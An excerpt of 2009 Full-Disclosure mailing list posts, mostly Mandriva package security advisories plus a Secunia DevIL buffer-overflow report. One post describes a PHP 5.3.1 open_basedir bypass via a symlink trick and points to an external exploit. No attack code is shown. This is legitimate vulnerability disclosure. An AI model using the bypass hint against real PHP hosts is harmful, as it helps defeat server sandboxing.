(GNU/Linux) iD8DBQFLGEpvmqjQ0CJFipgRAu4tAKDh5lUdwfU9ZVGfn1RgZPfnD5rjUgCggv8u +lOKwrO5RFXbqUDTcXm3Ikk= =Ivf3 -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 03:00:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 04:00:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:200-1 ] libxml Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:200-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libxml Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in libxml: Stack consumption vulnerability in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allows context-dependent attackers to cause a denial of service (application crash) via a large depth of element declarations in a DTD, related to a function recursion, as demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-2414). Multiple use-after-free vulnerabilities in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allow context-dependent attackers to cause a denial of service (application crash) via crafted (1) Notation or (2) Enumeration attribute types in an XML file, as demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-2416). This update provides a solution to these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 4c418296249dc8cc94b1b15e49b2d429 2008.0/i586/libxml1-1.8.17-11.1mdv2008.0.i586.rpm 7f55b33d9357641ccfbe9421c2818dc8 2008.0/i586/libxml1-devel-1.8.17-11.1mdv2008.0.i586.rpm 415af7a47df0783359018e7c8818123b 2008.0/i586/libxml2_2-2.6.30-1.6mdv2008.0.i586.rpm 44c479adb1d416beb45380e10398e350 2008.0/i586/libxml2-devel-2.6.30-1.6mdv2008.0.i586.rpm affb65b84643897980a4db16bac8262d 2008.0/i586/libxml2-python-2.6.30-1.6mdv2008.0.i586.rpm 517f2690932d66302975469282a7f624 2008.0/i586/libxml2-utils-2.6.30-1.6mdv2008.0.i586.rpm 1df8e776ad34bdfe5b68437e45718ff8 2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm f9eee25ac518012b01c9f54fbab3b3d8 2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5dcd354e680675ffd08c9f0d562e5686 2008.0/x86_64/lib64xml1-1.8.17-11.1mdv2008.0.x86_64.rpm 9ef4286da3bf35a2b07d1a86d63b577b 2008.0/x86_64/lib64xml1-devel-1.8.17-11.1mdv2008.0.x86_64.rpm 09b50a18697fc91e9c801c3a8ffe83b4 2008.0/x86_64/lib64xml2_2-2.6.30-1.6mdv2008.0.x86_64.rpm 4453c937d9dfabdc9526f253fe0a14aa 2008.0/x86_64/lib64xml2-devel-2.6.30-1.6mdv2008.0.x86_64.rpm 2ab42a3413a471384a6e280d7afc3c90 2008.0/x86_64/libxml2-python-2.6.30-1.6mdv2008.0.x86_64.rpm 3e3127451a7348e2ef8e4990122c3518 2008.0/x86_64/libxml2-utils-2.6.30-1.6mdv2008.0.x86_64.rpm 1df8e776ad34bdfe5b68437e45718ff8 2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm f9eee25ac518012b01c9f54fbab3b3d8 2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGE/cmqjQ0CJFipgRAk/PAKCz43qimvWl4XvfLCAWGlKd7OlgHACgsV/X APy0BqGd7fLxPXDfkwOAKKg= =tR4I -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 03:11:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 04:11:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:201-1 ] fetchmail Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:201-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : fetchmail Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in fetchmail: socket.c in fetchmail before 6.3.11 does not properly handle a '\0' (NUL) character in a domain name in the subject's Common Name (CN) and subjectAlt(ernative)Name fields of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-2666). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2666 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 3f4057bfc548c1dccf0d3f9bc4fe8f85 2008.0/i586/fetchmail-6.3.8-4.2mdv2008.0.i586.rpm 76bf19b1f8772966c5044109c348da26 2008.0/i586/fetchmailconf-6.3.8-4.2mdv2008.0.i586.rpm e3e362ecde9e175a34d1df8d2188d59f 2008.0/i586/fetchmail-daemon-6.3.8-4.2mdv2008.0.i586.rpm 1822d2316b99f4ffaa18e482ed29c7f6 2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a0f3f51fd21b8b002c55e7a189cfe4b4 2008.0/x86_64/fetchmail-6.3.8-4.2mdv2008.0.x86_64.rpm 31842cc17128e39c0626c6ce49b2b1e8 2008.0/x86_64/fetchmailconf-6.3.8-4.2mdv2008.0.x86_64.rpm 7291111ad2f72304f5611c67095bac5d 2008.0/x86_64/fetchmail-daemon-6.3.8-4.2mdv2008.0.x86_64.rpm 1822d2316b99f4ffaa18e482ed29c7f6 2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGFJGmqjQ0CJFipgRAiJLAJ9AT7DMQJoM2Ogh8Jy4KQukg+9AuQCfY/eE rt2NtIHert3paSccxoYh9pI= =VakF -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 03:22:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 04:22:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:203-1 ] curl Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:203-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : curl Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in curl: lib/ssluse.c in cURL and libcurl 7.4 through 7.19.5, when OpenSSL is used, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-2417). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: d1711e92c3f50c541bad2ebc92e1997e 2008.0/i586/curl-7.16.4-2.2mdv2008.0.i586.rpm 7483d1c5e09cbdaa4091f7e005f844a1 2008.0/i586/libcurl4-7.16.4-2.2mdv2008.0.i586.rpm 59374804184515524a92e7032c15e27f 2008.0/i586/libcurl-devel-7.16.4-2.2mdv2008.0.i586.rpm 82c7f004df0b5410c1bd0e4f245abf17 2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 60168194a95389f0eef488361e9c41c6 2008.0/x86_64/curl-7.16.4-2.2mdv2008.0.x86_64.rpm c7957352289282f49d0a749022d43309 2008.0/x86_64/lib64curl4-7.16.4-2.2mdv2008.0.x86_64.rpm 53be863ff6e89077c114c87646bf6435 2008.0/x86_64/lib64curl-devel-7.16.4-2.2mdv2008.0.x86_64.rpm 82c7f004df0b5410c1bd0e4f245abf17 2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGFUgmqjQ0CJFipgRAmDvAKC9VSBsewBvAVxsvV4C0wnJ1xxdgwCfbhCU IIyhdmnx2hBsXaVD3NWitv8= =Nvbn -----END PGP SIGNATURE----- From cxib at securityreason.com Fri Dec 4 00:27:50 2009 From: cxib at securityreason.com (Maksymilian Arciemowicz) Date: Fri, 04 Dec 2009 01:27:50 +0100 Subject: [Full-disclosure] PHP 5.3.1 open_basedir bypass Message-ID: <4B185786.2050007@securityreason.com> hi, in php 5.3.1 security changelog, we can read, that safe_mode bypass in tempnam() has been already fixed. But safe_mode in 5.3 line is deprecated. We can understand security fix for open_basedir bypass, but not for safe_mode in 5.3. Annoying is the fact, that exploit for bypass open_basedir or safe_mode in php 5.3.1 is avaliable in http://securityreason.com/achievement_exploitalert/14 we can use symlink trick like in http://securityreason.com/achievement_securityalert/70 The issue has been reported to PHP, but did not obtain a meaningful response. Very similar issue has been reproted in October 2006 by Stefan Esser (SREASON:1692) http://securityreason.com/securityalert/1692 This issue has been fixed. Small difference, with this is that we need create fake directories structure. -- Best Regards, ------------------------ pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 163 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091204/7ca08593/attachment.bin From security at mandriva.com Fri Dec 4 13:35:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 14:35:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:206-1 ] wget Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:206-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wget Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in wget: GNU Wget before 1.12 does not properly handle a '\0' (NUL) character in a domain name in the Common Name field of an X.509 certificate, which allows man-in-the-middle remote attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-3490). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3490 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: a4bf5040e83c9a4b6a2178b795ab4c54 2008.0/i586/wget-1.10.2-6.1mdv2008.0.i586.rpm f15f03d9076965a40fc48384bceda628 2008.0/SRPMS/wget-1.10.2-6.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 6284a52aa7dd4d24ef5405326f3992f5 2008.0/x86_64/wget-1.10.2-6.1mdv2008.0.x86_64.rpm f15f03d9076965a40fc48384bceda628 2008.0/SRPMS/wget-1.10.2-6.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGOSamqjQ0CJFipgRAuEAAJ42B4gK8ckUhjpyOPvD8BgfoGIJyQCeMJ5h ATSO4z2FwJPwAEtIGaiVXwc= =9t6t -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 13:54:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 14:54:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:213-1 ] wxgtk Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:213-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wxgtk Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 https://bugs.gentoo.org/show_bug.cgi?id=280615 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: c9debad43de2a2c609d5a3c9ad4aaf34 2008.0/i586/libwxgtk2.6-2.6.4-13.1mdv2008.0.i586.rpm 491857bb1aad3f767ae0a35a520042b5 2008.0/i586/libwxgtk2.6-devel-2.6.4-13.1mdv2008.0.i586.rpm 690203005f06910fdfc31c574a17995e 2008.0/i586/libwxgtk2.8-2.8.4-3.1mdv2008.0.i586.rpm 0c8f966ccc7acc4b273be05638f2c9dd 2008.0/i586/libwxgtk2.8-devel-2.8.4-3.1mdv2008.0.i586.rpm dda489d2d549b7060cbc141933d09366 2008.0/i586/libwxgtkgl2.6-2.6.4-13.1mdv2008.0.i586.rpm b1d340906398d68456781d021a05b119 2008.0/i586/libwxgtkgl2.8-2.8.4-3.1mdv2008.0.i586.rpm 7386ef8e1b19838621bc268e80bf2abf 2008.0/i586/libwxgtkglu2.6-2.6.4-13.1mdv2008.0.i586.rpm 9b4af47cb5dc5e4a10a3ca3cdfbfc084 2008.0/i586/libwxgtkglu2.8-2.8.4-3.1mdv2008.0.i586.rpm 54bdfb189c7ab70e1629958030ba8d34 2008.0/i586/libwxgtku2.6-2.6.4-13.1mdv2008.0.i586.rpm bf2b2694cd8c99dd213c08f06dd923ce 2008.0/i586/libwxgtku2.6-devel-2.6.4-13.1mdv2008.0.i586.rpm b4416dee9d8bfa5e1d65771843f4e9e7 2008.0/i586/libwxgtku2.8-2.8.4-3.1mdv2008.0.i586.rpm b715314accdddc8c012ac3b2ced2e7b7 2008.0/i586/libwxgtku2.8-devel-2.8.4-3.1mdv2008.0.i586.rpm d95938c1c8dbd4ff1e08587c4a75dc38 2008.0/i586/wxGTK2.6-2.6.4-13.1mdv2008.0.i586.rpm 9a351f86e1706c23445fcff5231abb8e 2008.0/i586/wxgtk2.8-2.8.4-3.1mdv2008.0.i586.rpm f2947e0187a27f7c570d313ec4fb2411 2008.0/SRPMS/wxGTK2.6-2.6.4-13.1mdv2008.0.src.rpm 8a65fa3754ca2129eeae76231cc562b0 2008.0/SRPMS/wxgtk2.8-2.8.4-3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 412be44c2d4376c1b1296e976d3aa688 2008.0/x86_64/lib64wxgtk2.6-2.6.4-13.1mdv2008.0.x86_64.rpm f1c13be1aefcb16711252b373ccf48b0 2008.0/x86_64/lib64wxgtk2.6-devel-2.6.4-13.1mdv2008.0.x86_64.rpm b0ddb173a329771c54e7fc7c9b6b6743 2008.0/x86_64/lib64wxgtk2.8-2.8.4-3.1mdv2008.0.x86_64.rpm af4405937400de5419440c74dac5c5b9 2008.0/x86_64/lib64wxgtk2.8-devel-2.8.4-3.1mdv2008.0.x86_64.rpm 8d57420c4a5490ad9d9d35eb808b9979 2008.0/x86_64/lib64wxgtkgl2.6-2.6.4-13.1mdv2008.0.x86_64.rpm d37432dc3d9c812a7db68e321e08e5d6 2008.0/x86_64/lib64wxgtkgl2.8-2.8.4-3.1mdv2008.0.x86_64.rpm c8cfba5e929c3aa0961063ba4b7adf83 2008.0/x86_64/lib64wxgtkglu2.6-2.6.4-13.1mdv2008.0.x86_64.rpm e8738253d90108918ea44b386a590782 2008.0/x86_64/lib64wxgtkglu2.8-2.8.4-3.1mdv2008.0.x86_64.rpm 0c1971f51c8de5eee74584cc91da9c9d 2008.0/x86_64/lib64wxgtku2.6-2.6.4-13.1mdv2008.0.x86_64.rpm 39e4a8eb50a0bfad249492b9bc1b3ef9 2008.0/x86_64/lib64wxgtku2.6-devel-2.6.4-13.1mdv2008.0.x86_64.rpm b71011075bf441c0d09fca612376dd28 2008.0/x86_64/lib64wxgtku2.8-2.8.4-3.1mdv2008.0.x86_64.rpm e3ef0474af6e94653b1291fbedd50ef5 2008.0/x86_64/lib64wxgtku2.8-devel-2.8.4-3.1mdv2008.0.x86_64.rpm e37ac1c0f99af42ac9641d786ffc30f8 2008.0/x86_64/wxGTK2.6-2.6.4-13.1mdv2008.0.x86_64.rpm 42dbbaef3787bd36c087cdb67deca94b 2008.0/x86_64/wxgtk2.8-2.8.4-3.1mdv2008.0.x86_64.rpm f2947e0187a27f7c570d313ec4fb2411 2008.0/SRPMS/wxGTK2.6-2.6.4-13.1mdv2008.0.src.rpm 8a65fa3754ca2129eeae76231cc562b0 2008.0/SRPMS/wxgtk2.8-2.8.4-3.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGOkvmqjQ0CJFipgRAql9AJ0cNi0pwAEKmSh3C95G6A4sVfwWpgCg5yii zkLvSyTr5e+d1LO84/F9sq4= =gj94 -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 14:13:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 15:13:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:208-1 ] libgadu Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:208-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libgadu Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in libgadu: libgadu before 1.8.2 allows remote servers to cause a denial of service (crash) via a contact description with a large length, which triggers a buffer over-read (CVE-2008-4776). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4776 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 81809df3e0b03835018466bf0ba471ec 2008.0/i586/libgadu3-1.7.1-5.1mdv2008.0.i586.rpm a31b60277b293170877f42f8d144e0d8 2008.0/i586/libgadu-devel-1.7.1-5.1mdv2008.0.i586.rpm bb3f731068198a4515be7c8fd67f6e5b 2008.0/i586/libgadu-static-devel-1.7.1-5.1mdv2008.0.i586.rpm b75cb6f9da59d14e459528151655baa6 2008.0/SRPMS/libgadu-1.7.1-5.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: fe2a020d21c3c14e170aeb64aff9ac44 2008.0/x86_64/lib64gadu3-1.7.1-5.1mdv2008.0.x86_64.rpm 0cec93b5638e9d1d7032fc36181841ae 2008.0/x86_64/lib64gadu-devel-1.7.1-5.1mdv2008.0.x86_64.rpm 40daf207c436ffbb4533b83f57bb590d 2008.0/x86_64/lib64gadu-static-devel-1.7.1-5.1mdv2008.0.x86_64.rpm b75cb6f9da59d14e459528151655baa6 2008.0/SRPMS/libgadu-1.7.1-5.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGO2cmqjQ0CJFipgRAj5JAJ9ZatBoof9pe68EKLOEFVwNmhUTXwCg8+nX 8en/VLS9hnsgQn7aVD4M3N4= =97ao -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 14:31:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 15:31:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:211-1 ] expat Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:211-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : expat Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 https://bugs.gentoo.org/show_bug.cgi?id=280615 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 161e54e15e10cfbd2ffb3ab2879c8920 2008.0/i586/expat-2.0.1-4.1mdv2008.0.i586.rpm 46ed11120902848ebd4e19a63f4c8974 2008.0/i586/libexpat1-2.0.1-4.1mdv2008.0.i586.rpm 4ccceed9651a932eeba0d815c5440a7e 2008.0/i586/libexpat1-devel-2.0.1-4.1mdv2008.0.i586.rpm 0cd2a8f3ad232480febc37c73448d79a 2008.0/SRPMS/expat-2.0.1-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 775166f9732ecbbeb7c4875c34fff00e 2008.0/x86_64/expat-2.0.1-4.1mdv2008.0.x86_64.rpm dabd3d5871d4a128071b04a10bf54565 2008.0/x86_64/lib64expat1-2.0.1-4.1mdv2008.0.x86_64.rpm 304cd751a38047d8256c950c25975ac8 2008.0/x86_64/lib64expat1-devel-2.0.1-4.1mdv2008.0.x86_64.rpm 0cd2a8f3ad232480febc37c73448d79a 2008.0/SRPMS/expat-2.0.1-4.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGPHxmqjQ0CJFipgRAiW4AKDYH3YsN9YJ8IBqCaoQ3rckGuQRHgCdF1+O fNj4q9If60c5Ftm4pz+e4AI= =vATG -----END PGP SIGNATURE----- From remove-vuln at secunia.com Fri Dec 4 13:21:20 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Fri, 4 Dec 2009 14:21:20 +0100 Subject: [Full-disclosure] Secunia Research: DevIL DICOM "GetUID()" Buffer Overflow Vulnerability Message-ID: <200912041321.nB4DLK6j019777@CA-IX-1.intnet> ====================================================================== Secunia Research 04/12/2009 - DevIL DICOM "GetUID()" Buffer Overflow Vulnerability - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * DevIL 1.7.8 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote ====================================================================== 3) Vendor's Description of Software "Developer's Image Library (DevIL) is a cross-platform image library utilizing a simple syntax to load, save, convert, manipulate, filter and display a variety of images with ease.". Product Link: http://openil.sourceforge.net/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in DevIL, which can be exploited by malicious people to compromise an application using the library. The vulnerability is caused by a boundary error within the "GetUID()" function in src-IL/src/il_dicom.c. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into opening a specially crafted DICOM file in an application using the library. The vulnerability is confirmed in version 1.7.8. Other versions may also be affected. ====================================================================== 5) Solution Do not open untrusted DICOM files. ====================================================================== 6) Time Table 27/11/2009 - Vendor and vendor-sec notified. 03/12/2009 - Vendor response. 04/12/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Stefan Cornelius, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-3994 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-51/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From security at mandriva.com Fri Dec 4 16:24:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 17:24:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:212-1 ] python Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:212-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : python Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 https://bugs.gentoo.org/show_bug.cgi?id=280615 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: d299993b7e9e67f4dd9d8174a3303e33 2008.0/i586/libpython2.5-2.5.2-2.4mdv2008.0.i586.rpm 3a3065367761a3f4adafcdb5db47fa24 2008.0/i586/libpython2.5-devel-2.5.2-2.4mdv2008.0.i586.rpm 6c10b6e2dbb2cfe401b999951488741c 2008.0/i586/python-2.5.2-2.4mdv2008.0.i586.rpm d4f8d49c7345d3473acca6c392918d5f 2008.0/i586/python-base-2.5.2-2.4mdv2008.0.i586.rpm 4c1cd90bd7f0690617acdc2140d063b6 2008.0/i586/python-docs-2.5.2-2.4mdv2008.0.i586.rpm e0cc1c4c45cd6059866ffd5cb1885a1f 2008.0/i586/tkinter-2.5.2-2.4mdv2008.0.i586.rpm 12b668dc2b0704a999522026bace8311 